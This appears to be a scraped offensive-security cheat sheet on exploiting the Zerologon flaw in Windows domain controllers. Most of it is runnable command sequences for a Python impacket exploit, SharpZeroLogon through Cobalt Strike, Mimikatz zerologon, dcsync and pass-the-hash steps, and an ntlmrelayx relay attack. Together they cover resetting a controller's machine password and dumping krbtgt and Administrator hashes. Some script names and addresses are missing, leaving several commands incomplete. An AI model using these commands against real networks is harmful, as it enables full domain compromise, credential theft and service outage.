Skip to content



White Paper from Secura :

Exploit steps from the white paper

  1. Spoofing the client credential
  2. Disabling signing and sealing
  3. Spoofing a call
  4. Changing a computer's AD password to null
  5. From password change to domain admin
  6. ⚠ reset the computer's AD password in a proper way to avoid any Deny of Service

  7. - Python script from dirkjanm

      # Check (
      proxychains python3 DC01
    $ git clone
    # Activate a virtual env to install impacket
    $ python3 -m venv venv
    $ source venv/bin/activate
    $ pip3 install .
    # Exploit the CVE (
    proxychains python3 DC01
    # Find the old NT hash of the DC
    proxychains -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL'
    # Restore password from secretsdump 
    # secretsdump will automatically dump the plaintext machine password (hex encoded) 
    # when dumping the local registry secrets on the newest version
    python CORP/DC01@DC01.CORP.LOCAL -target-ip -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3

  8. nccfsas - .NET binary for Cobalt Strike's execute-assembly

    git clone
    # Check
    execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local
    # Resetting the machine account password
    execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset
    # Testing from a non Domain-joined machine
    execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch
    # Now reset the password back

  9. Mimikatz - 2.2.0 20200917 Post-Zerologon

    # Check for the CVE
    lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$
    # Exploit the CVE and set the computer account's password to ""
    lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit
    # Execute dcsync to extract some hashes
    lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
    lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
    # Pass The Hash with the extracted Domain Admin hash
    sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN
    # Use IP address instead of FQDN to force NTLM with Windows APIs 
    # Reset password to Waza1234/Waza1234/Waza1234/
    lsadump::postzerologon /target: /account:DC01$

  10. netexec - only check

    netexec smb -u username -p password -d domain -M zerologon

A 2nd approach to exploit zerologon is done by relaying authentication.

This technique, found by dirkjanm, requires more prerequisites but has the advantage of having no impact on service continuity. The following prerequisites are needed: * A domain account * One DC running the PrintSpooler service * Another DC vulnerable to zerologon

  • ntlmrelayx - from Impacket and any tool such as
    # Check if one DC is running the PrintSpooler service | grep -A 6 "spoolsv"
    # Setup ntlmrelay in one shell -t dcsync://DC01.LAB.LOCAL -smb2support
    #Trigger printerbug in 2nd shell
    python3 'LAB.LOCAL'/joe:Password123@